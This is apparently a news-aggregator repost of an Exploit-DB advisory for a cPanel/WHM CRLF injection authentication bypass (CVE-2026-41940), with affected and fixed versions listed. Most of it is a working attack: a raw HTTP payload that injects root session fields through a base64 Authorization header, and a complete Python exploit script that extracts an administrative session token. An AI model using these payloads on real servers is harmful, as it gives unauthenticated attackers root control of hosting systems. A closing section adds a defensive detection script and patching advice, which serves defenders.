Security News

Cybersecurity news aggregator

CRITICAL Vulnerabilities Exploit-DB

[webapps] cPanel - CRLF Injection

A critical CRLF injection vulnerability (CVE-2026-41940, CVSS 9.8) in cPanel & WHM's `cpsrvd` daemon allows unauthenticated remote attackers to bypass authentication and gain root privileges by injecting malicious session parameters via the `whostmgrsession` cookie or `Authorization` header. Affected versions include cPanel 11.40 through 86.0.40, 88.0.0 through 110.0.96, 112.0.0 through 118.0.62, 120.0.0 through 124.0.34, and 126.0.1 through 126.0.53. The vulnerability is fixed in versions 86.0.41, 110.0.97, 118.0.63, 124.0.35, 126.0.54, 130.0.19, 132.0.29, 134.0.20, 136.0.5, and 136.1.7.

EDB-ID: 52574
CVE: 2026-41940
Author: NU11SECUR1TY
Type: WEBAPPS
Platform: PHP
Date: 2026-05-26

# Exploit Title: cPanel 11.40 - CRLF Injection
# Author: nu11secur1tyAI
# Date: 2026-04-30
# Vendor: cPanel, L.L.C.
# Software: cPanel & WHM (cpsrvd)
# Reference: CVE-2026-41940 / watchTowr-2026-01

## Description:
A critical authentication bypass vulnerability exists in the cPanel/WHM `cpsrvd` daemon due to improper neutralization of line delimiters (CRLF) in the `whostmgrsession` cookie and `Authorization` headers. An unauthenticated remote attacker can leverage this flaw to inject malicious session parameters directly into the server's flat-file session metadata store. By injecting sequences such as `user=root`, `hasroot=1`, and `tfa_verified=1`, the attacker subverts the internal authentication logic, forcing the system to issue a valid administrative session token (`/cpsessXXXXXXXXXX/`). This grants the attacker full `root` privileges over the WHM interface and the host operating system without requiring valid credentials.

STATUS: MEDIUM - HIGH / Vulnerability

[+] Payload:

```http
GET / HTTP/1.1
Host: [TARGET_HOST]:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[PREAUTH_SESSION_ID]
Connection: close
```

[+] Exploit (Python):

```python
import argparse
import re
import requests
import urllib.parse
import urllib3

# Disable SSL warnings for cleaner output
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Crafted B64 payload:
# root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1
PAYLOAD_B64 = "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x"

def exploit(target):
    s = requests.Session()
    s.verify = False

    print(f"[*] Initializing attack on {target}...")

    # Stage 1: Obtain pre-auth session base
    try:
        r = s.post(f"{target}/login/?login_only=1",
                   data={"user": "root", "pass": "wrong_pass"},
                   allow_redirects=False, timeout=10)

        cookie = r.headers.get("Set-Cookie", "")
        match = re.search(r"whostmgrsession=([^;,]+)", cookie)
        if not match:
            print("[-] Error: Could not retrieve whostmgrsession cookie.")
            return

        session_base = urllib.parse.unquote(match.group(1))
        print(f"[+] Obtained session base: {session_base}")

        # Stage 2: Poison session via CRLF Injection
        headers = {
            "Authorization": f"Basic {PAYLOAD_B64}",
            "Cookie": f"whostmgrsession={urllib.parse.quote(session_base)}",
            "Connection": "close"
        }

        r = s.get(f"{target}/", headers=headers, allow_redirects=False, timeout=10)

        # Stage 3: Extract leaked security token
        location = r.headers.get("Location", "")
        token_match = re.search(r"/cpsess\d{10}", location)

        if token_match:
            token = token_match.group(0)
            print(f"[!] EXPLOIT SUCCESSFUL!")
            print(f"[!] Leaked Token: {token}")
            print(f"[!] Access URL: {target}{token}/")
        else:
            print("[-] Exploit failed. The target may be patched or protected by a WAF.")

    except Exception as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="cPanel/WHM CVE-2026-41940 Exploit")
    parser.add_argument("--target", required=True, help="Target URL (e.g., https://192.168.1.1:2087)")
    args = parser.parse_args()
    exploit(args.target.rstrip("/"))
```

[+] Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-41940

Time spent: 03:45:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/
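For defenders, the injection described above is visible in request headers before it reaches `cpsrvd`: the decoded `Basic` credential or the URL-decoded `whostmgrsession` cookie contains CR/LF. The following is an added detection example, not part of the original advisory or of cPanel; the function names, the header-dict input shape and the sample requests are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Session fields the advisory names as injected values.
INJECTED_KEYS = {"user", "hasroot", "tfa_verified",
                 "successful_internal_auth_with_timestamp"}

def decode_basic(value):
    """Return the decoded bytes of a Basic credential, or None if absent/invalid."""
    m = re.fullmatch(r"\s*Basic\s+([A-Za-z0-9+/=]+)\s*", value, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None

def inspect_request(headers):
    """Return findings for one request; headers is a dict with canonical names."""
    findings = []
    raw = decode_basic(headers.get("Authorization", ""))
    if raw is not None and (b"\r" in raw or b"\n" in raw):
        findings.append("authorization: CR/LF in decoded Basic credentials")
        # Every line after the first is data the client should not control.
        for line in re.split(rb"[\r\n]+", raw)[1:]:
            key = line.split(b"=", 1)[0].decode("latin-1").strip().lower()
            if b"=" in line and key in INJECTED_KEYS:
                findings.append(f"authorization: injected session field '{key}'")
    for part in headers.get("Cookie", "").split(";"):
        name, _, val = part.strip().partition("=")
        if name == "whostmgrsession" and re.search(r"[\r\n]", unquote(val)):
            findings.append("cookie: CR/LF in whostmgrsession after URL-decoding")
    return findings

# Constructed sample requests (not captured traffic).
_plain = (b"root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999"
          b"\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1")
SAMPLE_INJECTED = {"Authorization": "Basic " + base64.b64encode(_plain).decode()}
SAMPLE_BENIGN = {"Authorization": "Basic " + base64.b64encode(b"admin:s3cret").decode(),
                 "Cookie": "whostmgrsession=%3aAbCdEf123; lang=en"}
SAMPLE_COOKIE = {"Cookie": "whostmgrsession=%3aAbCdEf123%0d%0ahasroot%3d1"}

if __name__ == "__main__":
    for label, req in [("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN),
                       ("cookie", SAMPLE_COOKIE)]:
        print(label, inspect_request(req))
```

A check like this belongs in a reverse proxy, WAF rule or log pipeline in front of ports such as 2087; it complements, and does not replace, upgrading to one of the fixed versions listed above.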
